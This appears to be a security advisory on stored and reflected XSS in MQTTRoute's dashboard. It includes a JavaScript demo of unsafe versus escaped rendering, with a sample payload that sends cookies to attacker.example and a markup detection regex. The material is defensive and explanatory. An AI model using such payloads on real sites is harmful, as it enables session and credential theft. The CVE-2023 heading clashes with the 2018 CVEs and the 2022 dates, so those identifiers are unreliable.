MQTTRoute versions prior to 3.3 allow an attacker to inject arbitrary HTML or script code into the dashboard name text field (CVE-2018-19384), and versions 3.3.1 through 3.3.14 and 3.4.0 allow an attacker to inject arbitrary JavaScript via a crafted URL (CVE-2018-19385). The dashboard name field is also reported as injectable in 3.3.1 through 3.3.14 and 3.4.0. In both cases the injected script runs in the browser of whoever views the affected page, within the application's origin, so an attacker can read session cookies or other sensitive information, or perform actions in the application as that user. Cross-site scripting (XSS) is one of the most common web application vulnerability classes. It is distinct from SQL injection (which targets database queries) and from CSRF (which forges a request without running attacker code): what XSS provides is attacker-controlled script or HTML in the application's response, either stored (the dashboard name is saved and rendered to every later viewer) or reflected (the crafted URL echoes its parameter into the page). Until a vendor-fixed build is installed, administrators should not follow untrusted links to the MQTTRoute dashboard and should treat dashboard names created by other users as untrusted content, since a script running in the dashboard can capture whatever the logged-in user enters, including credentials.

CVE-2023-35613

The Manage Projects module of MQTTRoute is affected by three issues. It does not properly verify the existence of a project in its deployment list, and it allows an attacker to inject arbitrary HTML or script code into the dashboard name text field (CVE-2018-19384). In versions 3.3.1 through 3.3.14 and 3.4.0 it allows an attacker to inject arbitrary JavaScript via a crafted URL (CVE-2018-19385). In the same versions a crafted URL can also be used to perform unauthorized actions against the project list in the context of the logged-in user, such as reading sensitive information or carrying out other privileged operations (CVE-2018-19386).
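The two injection paths described above (the stored dashboard-name field and the reflected crafted-URL parameter) reduce to the same rendering mistake: user-controlled text is concatenated into markup without escaping. The following is an added example written for this page, not MQTTRoute's own code. The function names, the `name` query parameter, the tile markup and the hostile input are all assumptions constructed for illustration. It shows the vulnerable concatenation beside the escaped form for both the stored and the reflected case, plus the input-side check and output-side detection a maintainer would add.

```javascript
// Added example (not MQTTRoute's code): how a dashboard-name field and a URL
// parameter become XSS sinks, and the minimal fix. All names are assumptions.

// Constructed attacker input of the kind a "dashboard name" text field accepts.
// A broken image fires onerror immediately, exfiltrating the viewer's cookies.
const HOSTILE_NAME =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Escape the five characters that matter in HTML text and attribute contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Vulnerable pattern (stored XSS, CVE-2018-19384 style): the saved name is
// concatenated straight into markup, so every viewer's browser parses the tag.
function renderDashboardTileUnsafe(name) {
  return `<div class="tile"><h3>${name}</h3></div>`;
}

// Hardened: the name is escaped at the point it enters markup.
function renderDashboardTileSafe(name) {
  return `<div class="tile"><h3>${escapeHtml(name)}</h3></div>`;
}

// Reflected XSS via crafted URL (CVE-2018-19385 style): a query parameter is
// echoed into the response. URLSearchParams decodes the value, so the raw
// "<script>" reaches the page unless it is escaped on output.
function reflectedParamUnsafe(url, param) {
  const v = new URL(url).searchParams.get(param) ?? '';
  return `<p>Showing dashboard: ${v}</p>`;
}

function reflectedParamSafe(url, param) {
  const v = new URL(url).searchParams.get(param) ?? '';
  return `<p>Showing dashboard: ${escapeHtml(v)}</p>`;
}

// Input-side check: a dashboard name is a short label, so reject markup
// metacharacters at the form boundary. This is defence in depth, not a
// substitute for output escaping.
function isValidDashboardName(name) {
  return typeof name === 'string' &&
    name.length > 0 && name.length <= 64 &&
    !/[<>"'&]/.test(name);
}

// Output-side detection: did an attacker-supplied active element survive as a
// real tag in the rendered HTML? Escaped text ("&lt;img") does not match.
function containsActiveMarkup(html) {
  return /<(script|img|svg|iframe)\b/i.test(html);
}

// Stand-alone demonstration.
const craftedUrl =
  'https://broker.example/dashboard?name=<script>alert(1)</script>';
console.log('unsafe tile :', renderDashboardTileUnsafe(HOSTILE_NAME));
console.log('safe tile   :', renderDashboardTileSafe(HOSTILE_NAME));
console.log('unsafe echo :', reflectedParamUnsafe(craftedUrl, 'name'));
console.log('safe echo   :', reflectedParamSafe(craftedUrl, 'name'));
console.log('name accepted?', isValidDashboardName(HOSTILE_NAME));
```

Escaping at the output boundary is the fix that actually closes both CVEs; the input check only narrows the attack surface for this one field. Serving the dashboard with a Content-Security-Policy that disallows inline script and marking the session cookie HttpOnly limits what a surviving injection can do, but neither replaces the escaping.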

MQTTRoute Versions Affected

MQTTRoute versions prior to 3.3 are vulnerable to the stored XSS in the dashboard name field (CVE-2018-19384). Versions 3.3.1 through 3.3.14 and 3.4.0 are vulnerable to the reflected XSS via a crafted URL (CVE-2018-19385) and to unauthorized actions against the project list via a crafted URL (CVE-2018-19386); the dashboard name field is also reported as injectable in these versions.

Timeline

Published on: 10/13/2022 23:15:00 UTC
Last modified on: 10/14/2022 13:18:00 UTC

References